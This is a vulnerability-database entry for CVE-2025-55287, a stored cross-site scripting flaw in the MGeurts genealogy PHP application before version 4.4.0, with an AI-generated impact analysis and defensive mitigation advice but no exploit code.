Skip to main content

CVE-2025-55287: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in MGeurts genealogy

High
VulnerabilityCVE-2025-55287cvecve-2025-55287cwe-79
Published: Mon Aug 18 2025 (08/18/2025, 16:54:17 UTC)
Source: CVE Database V5
Vendor/Project: MGeurts
Product: genealogy

Description

Genealogy is a family tree PHP application. Prior to 4.4.0, Authenticated Stored Cross-Site Scripting (XSS) vulnerability was identified in the Genealogy application. Authenticated attackers could run arbitrary JavaScript in another user’s session, leading to session hijacking, data theft, and UI manipulation. This vulnerability is fixed in 4.4.0.

AI-Powered Analysis

AILast updated: 08/18/2025, 17:18:11 UTC

Technical Analysis

CVE-2025-55287 is a high-severity authenticated stored Cross-Site Scripting (XSS) vulnerability affecting versions of the MGeurts genealogy PHP application prior to 4.4.0. The vulnerability arises from improper neutralization of user-supplied input during web page generation (CWE-79). Specifically, authenticated attackers can inject malicious JavaScript code that is stored persistently within the application and executed in the context of other users’ sessions when they view the affected content. This allows the attacker to hijack user sessions, steal sensitive data, and manipulate the user interface. The vulnerability requires the attacker to have authenticated access, and exploitation involves user interaction, such as another user viewing the injected content. The CVSS 3.0 base score of 8.0 reflects the high impact on confidentiality, integrity, and availability, combined with relatively low attack complexity and no requirement for privileges beyond authentication. The flaw is fixed in version 4.4.0 of the application. No known exploits are currently reported in the wild, but the vulnerability poses a significant risk to organizations using vulnerable versions of the MGeurts genealogy software.

Potential Impact

For European organizations, particularly those involved in genealogy research, family history services, or cultural heritage institutions using the MGeurts genealogy application, this vulnerability could lead to severe consequences. Exploitation could result in unauthorized access to personal and genealogical data, which often includes sensitive personal information protected under GDPR. Session hijacking could allow attackers to impersonate legitimate users, potentially leading to further unauthorized data access or manipulation. UI manipulation could undermine user trust and damage organizational reputation. Given the nature of genealogy data, the breach of confidentiality could have privacy implications for European citizens. Additionally, if the application is integrated with other systems or used in multi-user environments, the scope of impact could extend beyond the genealogy platform itself. The requirement for authentication limits exposure to some extent, but insider threats or compromised credentials could facilitate exploitation.

Mitigation Recommendations

Organizations should immediately upgrade the MGeurts genealogy application to version 4.4.0 or later, where the vulnerability is patched. Until the upgrade is applied, implement strict input validation and output encoding on all user-supplied data within the application to prevent script injection. Employ Content Security Policy (CSP) headers to restrict the execution of unauthorized scripts. Conduct regular audits of user-generated content to detect and remove any malicious scripts. Enforce strong authentication mechanisms and monitor for suspicious login activities to reduce the risk of attacker access. Educate users about the risks of clicking on untrusted links or content within the genealogy platform. Additionally, consider isolating the genealogy application environment and restricting access to trusted users only. Implement web application firewalls (WAF) with rules targeting XSS attack patterns to provide an additional layer of defense.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2025-08-12T16:15:30.237Z
Cvss Version
3.0
State
PUBLISHED

Threat ID: 68a35cb2ad5a09ad00b0b5e0

Added to database: 8/18/2025, 5:02:42 PM

Last enriched: 8/18/2025, 5:18:11 PM

Last updated: 8/19/2025, 12:34:27 AM

Views: 3

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats